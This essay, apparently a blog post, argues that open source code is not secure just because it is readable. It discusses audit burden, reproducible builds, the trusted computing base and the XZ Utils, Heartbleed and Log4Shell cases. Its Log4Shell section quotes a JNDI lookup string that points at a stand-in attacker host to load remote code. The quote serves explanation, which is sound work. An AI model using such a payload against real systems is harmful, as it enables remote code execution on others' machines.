The secure open source fallacy

Most open source advocates, and many security professionals, often say things like “open source software is secure because you can just read the code”.

This argument assumes that the ability to read source code directly translates into the ability to understand, verify, and trust it, because you can see the files this software opens or the network sockets it listens on. You can see the kind of network data it sends, and the cryptography it uses.

This is usually contrasted with proprietary software, which is delivered only as an executable. Executables contain no human-readable source code; they are optimised machine instructions produced during compilation, often with additional obfuscation. So the intuition is simple: proprietary software hides its logic, while open source software exposes it.

“Just read it, bro”

Access to source code is not the same as the ability to meaningfully audit it. Modern software systems are enormous, interconnected, and often deeply complex. Understanding them requires specialised knowledge, extensive tooling, and a significant time investment, none of which most users have. Even security professionals rarely audit entire projects from scratch.

There are two basic reasons why this argument makes no sense: your personal time investment and deflecting that investment onto someone else.

Source available doesn’t mean you can read it

“If you don’t trust the source code, you can just audit it yourself” is an argument I see open-source advocates use far too often. This has to stop.

The people using this argument have probably never audited a significant, meaningful project; think of Linux, PulseAudio, Nginx, Dovecot, or Firefox. And, to be honest, that’s fine. Auditing a codebase is a costly endeavour that requires a team of dedicated professionals with years of experience and a multitude of tools. Just “reading” the source code is not enough.

The mere availability of source code is indeed a significant advantage, but it is not the only way to audit software. In professional security assessments, static source review is far less common than dynamic testing, fuzzing, or reverse engineering.

Source available also doesn’t mean people will just audit it in their free time

I deliberately used the phrase “source available” to avoid confusion between free software, open source software, and software with open-source parts. For this topic, the public availability of the source code is all that matters, not the licensing terms.

Even if the source code is one git clone away, that does not mean anyone will actually read it. At best, a handful of particularly motivated users might skim a few files that look interesting. But a meaningful security review requires following data flows, understanding the architecture, and reasoning about edge cases and failure modes. That is hard work that could take an experienced professional weeks or months. It’s not just a casual evening activity.

Most users, including developers, install software to solve a problem, not to perform unpaid security audits. They trust package managers, distributions, corporate reputation, or “what everyone else is using”. Even highly skilled security professionals do not have the time to audit every library, dependency, and tool they rely on. In a modern stack with hundreds or thousands of transitive dependencies, the idea that “people will just read the code” is not realistic.

There is also a problem of diffusion of responsibility. When millions of users depend on a project, each user could think that “Surely someone more qualified has already looked at this”. In practice, critical infrastructure is often maintained by one or two overworked volunteers, with no dedicated security team and no formal review process. The number of people with the experience and skills to audit code is small, and the number who will audit the entire source code for free is practically zero.

Reproducible builds

Source availability creates the possibility of independent audits, but even when someone does audit the source, that still leaves open a separate question: how do you know the binary you are actually running was built from that audited code? That is where concerns like reproducible builds, compilers, firmware, and supply-chain attacks start to matter.

A reproducible build is one where, given the same source code and defined build inputs, independent parties can run the build process and obtain bit‑for‑bit identical binaries. If two people build the same version of the software on their own machines, they should get the same output. Only then can you compare your binary to a known‑good one and have any confidence that nothing was swapped or tampered with in between.

In practice, most software is not reproducible by default. Builds often depend on details of the environment that change from one machine or one moment to the next. Some usual sources of non‑reproducibility include:

Timestamps embedded into binaries, logs, or version strings (__DATE__, __TIME__, “built on 2025‑11‑30”).
Absolute paths and usernames compiled into debug info or error messages (/home/alice/build/…).
Random identifiers or UUIDs generated during the build.
Non-deterministic ordering of files or symbols (e.g., relying on filesystem or hash map iteration order).
Differences in locales and environments, such as sorting, decimal separators, or environment variables.
Toolchain and dependency differences, where a slightly different compiler, linker, or library produces slightly different output.

None of this is malicious; it’s just how traditional build systems evolved. For decades, nobody cared whether two builds were bit‑identical. Developers got accustomed to embedding dates, hostnames, and custom flags because they were convenient for debugging or support, and build tools freely consumed whatever happened to be in the environment. Over time, the issue of build reproducibility arose. If I compile an identical source code on two identical machines, and they produce a different binary, how can I know the compiler didn’t tamper with the source code?

Making builds reproducible means systematically removing or controlling all these hidden sources of variation. That typically involves:

Freezing the environment: pinning compiler and dependency versions, and building in a controlled, isolated environment (containers, chroots, Nix/Guix‑style systems, etc.).
Normalising time and paths: replacing “current time” with a fixed build timestamp, and stripping or standardising absolute paths and usernames (for example, via a shared SOURCE_DATE_EPOCH).
Eliminating non-deterministic order: using stable sorting, fixed iteration orders, and deterministic archive/packaging tools.
Avoiding random data at build time: you can generate random data on the first run of the application, or seed randomness with a fixed, documented value.

Once a project adopts these practices, different people can independently build the same source and verify that they get identical binaries. That doesn’t solve every problem; you still have to worry about compilers, firmware, and the rest of the toolchain, but it at least closes a critical gap between “I audited this code” and “I trust this binary.”

Did you audit your compiler? Did you audit your operating system? Did you audit your disk’s firmware?

Source code cannot do anything on its own. If it’s an interpreted language (Ruby, Python, JavaScript, etc.), you need an interpreter. If it’s a compiled language (Go, C, C++, Rust, etc.), you need a compiler and possibly some external libraries.

You also need an operating system to run your development tools, and dozens of peripherals, storage controllers, memory subsystems and network interfaces, along with their corresponding firmware. Together, they form what security researchers call the trusted computing base: every piece of software and hardware that must be correct for the final program to behave as intended.

Once you start thinking in terms of the trusted computing base, you realise that the behaviour of the final binary depends on far more than the lines of source code you reviewed. The compiler, the standard library, the kernel, the dynamic linker, the CPU microcode, the disk controller firmware, and countless other factors all influence the machine code that ultimately runs.

That introduces additional factors and complexity into the process of auditing a binary…

Walled gardens (like Signal)

Some software projects publish their source code but still operate as walled gardens.

Signal is one of the best-known examples. The client and server are open source, but Signal is a non-federated messaging platform. Even though you can run your own server, doing so would isolate you from everyone on the official network, because your contacts would have to register against your server in order to message you, and in doing so, they would not be able to chat with other Signal users.

Drew DeVault goes into more detail on this topic in his post [archived version].

You can read the server source code, but you cannot meaningfully verify that Signal.org is running that code, nor can you choose to run an alternative implementation without losing access to the network.

In addition, Moxie, the author of Signal, doesn’t actually like third-party forks using the official Signal server[archived version].

While Signal offers reproducible builds [archived version], this does nothing to address the fact that you cannot verify or independently operate the server you are forced to trust.

This also places a significant burden on the Signal maintainers, and could be subject to bribes or targeted backdoors, especially for Signal users downloading the Signal application from the Google or Apple app store.

Supply chain attacks

In this post, I’ve explained why it’s unrealistic for anyone to audit every line of every open-source project.

I would also like to talk about something else: supply chain attacks.

A “supply chain attack” is a cybersecurity term that manifests when an application has a vulnerable or malicious dependency. Most software is not written from scratch: Common utilities are often used to build highly complex software that handles DNS resolution, compression, JSON parsing, network traffic, HTML rendering, and even distributed computing. Due to the nature of software engineering, supply chain attacks are becoming more frequent over time, because the more complex a piece of software is, the more likely it is to depend on something vulnerable.

Actually, as Ariadne points out [archived version], the software supply chain is not real:

For there to be a “supply chain”, there must be a supplier, which in turn requires a contractual relationship between two parties. With software licensed under FOSS licensing terms, a consumer receives a non-exclusive license to make use of the software however they wish (in accordance with the license requirements, of course), but non-exclusive licenses cannot and do not imply a contractual supplier-consumer relationship.

However, in this section, I will be describing some of the most famous cybersecurity events in recent history that affected or were affected by the use of a “software supply chain”, as it is an industry-agreed term.

The Jia Tan case (the XZ Utils backdoor)

XZ Utils is a widely used compression library (xz / liblzma) that ships with most Linux distributions. In early 2024, it was discovered that a maintainer account using the name “Jia Tan” had slipped a highly obfuscated backdoor into XZ Utils. Fortunately, the attack was thwarted thanks to Andres Freund, a Microsoft engineer who was benchmarking SSH startup latency.

Mr Freund was using a development version of Debian Linux and noticed that establishing SSH connections was slow. Instead of ignoring this, he used Valgrind to debug the OpenSSH process and noticed that something odd was going on with function calls, which he traced back to liblzma (part of XZ Utils).

The most dramatic part of this story is that OpenSSH does not depend on XZ Utils. The backdoor exploited an obscure dependency path through systemd: some distribution builds of OpenSSH link against libsystemd, which in turn depends on liblzma. This allowed the malicious library to override a cryptographic function used during authentication and accept attacker-provided SSH keys that would be otherwise rejected.

This backdoor would have allowed any attacker with the correct private SSH key access to every single OpenSSH server in the world that installed the vulnerable software.

This neatly illustrates the limits of “just read the source code”. XZ Utils is open source, but the backdoor evaded detection by both users and maintainers.

Jia Tan spent around 2 years building trust as a “good contributor”. They submitted normal-looking patches, fixed bugs, and responded to reviews. In addition, Lasse Collin, the sole maintainer of XZ Utils, was exhausted, but grateful to have a “helpful” new co-maintainer who would help him.

The backdoor was not present in the C source code or the public git repository. It was injected only into the release tarballs that Jia Tan, acting as a maintainer, personally generated and published. Those tarballs contained additional M4 macros and a hidden binary payload that did not exist in the public source code tree, allowing the malicious code to be compiled into liblzma during the build process.

Chronically underfunded volunteer-run enterprise software (OpenSSL and Heartbleed)

In this case, OpenSSL was not vulnerable to a supply-chain attack. Instead, it was the supply chain for tens of millions of devices that rely on cryptography. From cars that use cryptographically signed firmware updates to Smart TVs, smartphones, and enterprise hardware like firewall appliances and network security cameras. All these devices and millions more use a cryptographic library known as OpenSSL, maintained by the OpenSSL project. We are talking about tens of billions of dollars of infrastructure built on a single open-source project.

OpenSSL is a free, open-source and extremely popular cryptographic library. It implements TLS/SSL, handles X.509 certificates, performs low-level cryptography, and provides some of the most fundamental security primitives on which modern computing relies. It is, in many ways, part of the bedrock of the Internet.

And yet, for years, OpenSSL ran on a shoestring budget. Before 2014, the entire project received roughly $2,000 per year in donations. Its development was led primarily by one full-time developer, assisted by a handful of volunteers. This combination of massive responsibility and minimal resourcing created an environment where mistakes were not unlikely; they were inevitable.

Heartbleed (CVE-2014-0160) was one of those mistakes, and it was catastrophic.

The vulnerability was introduced by a seemingly harmless patch: an implementation of the TLS heartbeat extension in December 2011. The issue was a missing bounds check: a client could claim that a heartbeat message contained a payload of a certain length, while actually sending a much smaller payload. OpenSSL would allocate a buffer based on the claimed length and then copy that many bytes from memory, returning, along with the attacker’s one-byte payload, up to 64 KB of whatever happened to be in memory: private keys, session cookies, credentials or internal data structures.

The first vulnerable release, version 1.0.1 was released on 14th March 2012. OpenSSL version 1.0.1g, on 7th April 2014, fixed the vulnerability.

OpenSSL’s source code was, and remains, fully available. Anyone could have audited it. But few organisations stepped up, and even fewer were willing to fund full-time maintainers to keep it healthy.

When Heartbleed became public, companies poured money into emergency response, but not into sustained long-term support. It was only after the incident that the Linux Foundation launched the Core Infrastructure Initiative, explicitly acknowledging that critical open-source software cannot survive on volunteer labour alone.

The Risks of Deeply Embedded Dependencies (Log4Shell)

Log4j is a widely used Java logging library that sits at the bottom of countless Java applications, including many popular ones like Apache Kafka, Elasticsearch, Minecraft, and more.

Log4j has a feature called lookups: ${...} expressions in log patterns that are evaluated at runtime. One of those lookup types used the Java Naming and Directory Interface (JNDI), which can talk to directory services like LDAP.

Log4Shell was the name given to a vulnerability in this mechanism. If an attacker could cause a string like ${jndi:ldap://attacker.example.com/a} to appear in any logged field, Log4j would initiate the JndiLookup function to try to resolve the expression, which could direct the application to contact a malicious LDAP server with attacker-controlled Java bytecode that would be loaded onto the application. In many cases, this led directly to full remote code execution.

This vulnerability earned a CVSS score of 10 (the highest possible) due to its trivial exploitation path, the ubiquity of Log4j, and the catastrophic consequences of triggering it. It remains one of the clearest examples of how a deeply embedded dependency can compromise innumerable pieces of software, despite the source code being open to everyone.

Corporate profits above contributing to FOSS

Another often-overlooked reality is that many giant corporations reap enormous benefits from open-source software without contributing back, as illustrated by several high-profile examples:

FFmpeg: pay us or stop reporting bugs

FFmpeg, the world’s most famous multimedia library, is used everywhere from streaming services to smartphones, and a small group of unpaid developers maintains it.

A recent dispute [archived version] between the FFmpeg team and Google has started a conversation regarding the efforts of Google to report bugs in popular open source tools. Google’s AI-driven tools were finding and reporting vulnerabilities in this library, but they were not providing resources to fix them. Google spends millions of dollars on security research and bug hunting, but contributes next to nothing back to the open-source projects it works on.

FFmpeg asserts that security researchers should accompany vulnerability reports with patches or funding. Otherwise, they become a burden on already overstretched volunteers.

Apple and BSD

Apple’s macOS and iOS (that initially started as a version of OS X, the previous name for macOS) are built on an open-source BSD Unix core.

The licensing terms for BSD allow Apple to use this operating system as a base for a proprietary, highly profitable product without any requirement to contribute back. Apple was the first company to become a trillion-dollar company by market capitalisation, yet donated less than 500 USD in 2025 to the FreeBSD Foundation, which supports the BSD projects that made Apple’s operating system possible.

Over the years, Apple has built a range of robust security features on top of its BSD-derived foundation, including GateKeeper, notarised applications, System Integrity Protection (SIP), the Secure Enclave, Kernel Address Space Layout Randomisation (KASLR), app sandboxing, and more.

These are significant security innovations, but Apple developed and shipped them only for their proprietary products and never contributed them back to BSD. In essence, FreeBSD made macOS possible; Apple leveraged its open-source nature while keeping the most significant engineering achievements proprietary.

Deprecating the Nginx Ingress Controller

In 2025 [archived version], the Kubernetes authors made the shocking decision to retire one of the most popular open source ingress controllers available: The Nginx ingress controller.

Yet, despite its widespread adoption, the Nginx Ingress Controller (or Ingress NGINX) project had only one or two people doing development work on their own time, after work hours, and sometimes on weekends.

In early 2025, security researchers discovered critical flaws in Ingress NGINX that could allow complete cluster takeover [archived version]. Over 6,000 Internet-exposed deployments were found to be vulnerable. But rather than increasing support, the Kubernetes maintainers decided it wasn’t worth the risk and effort to keep the project alive.

Once again, the lesson is clear: critical open-source infrastructure used by thousands of corporations can be built and maintained by a handful of unpaid contributors, until it becomes too much. Then it’s deprecated, not resourced.

Conclusion

This post has taken a critical view of open-source security. Not because open source is inherently less secure than proprietary software, but because the usual arguments in its defence are often incomplete. Open source is invaluable, and the ability to inspect source code is essential in high-security environments. But this benefit only emerges if the code is actually reviewed, ideally by multiple independent teams with the expertise and time to do it properly.

Open source can be more secure than closed source, but openness does not automatically grant security. In some scenarios, the dynamics of volunteer maintainership, complex dependency chains, and informal release processes can make open-source projects more vulnerable to certain attack classes. The XZ Utils backdoor is one of these examples: the attack succeeded not because the code was visible, but because no one was looking.

By contrast, a supply-chain compromise like the Jia Tan case is far less likely (or even outright impossible) in an environment of proprietary software developed entirely in-house by a tightly controlled team; the “trusted volunteer” attack path simply does not exist.

However, proprietary software also has its own risks: insider threats, opaque codebases, and vulnerabilities that may remain undiscovered for years because no one outside the vendor can audit them.

At the end of the day, security comes from scrutiny, resources, discipline, and the complex and invaluable work of people who actually read, test, and verify the systems we depend on, and not from the release model of the software.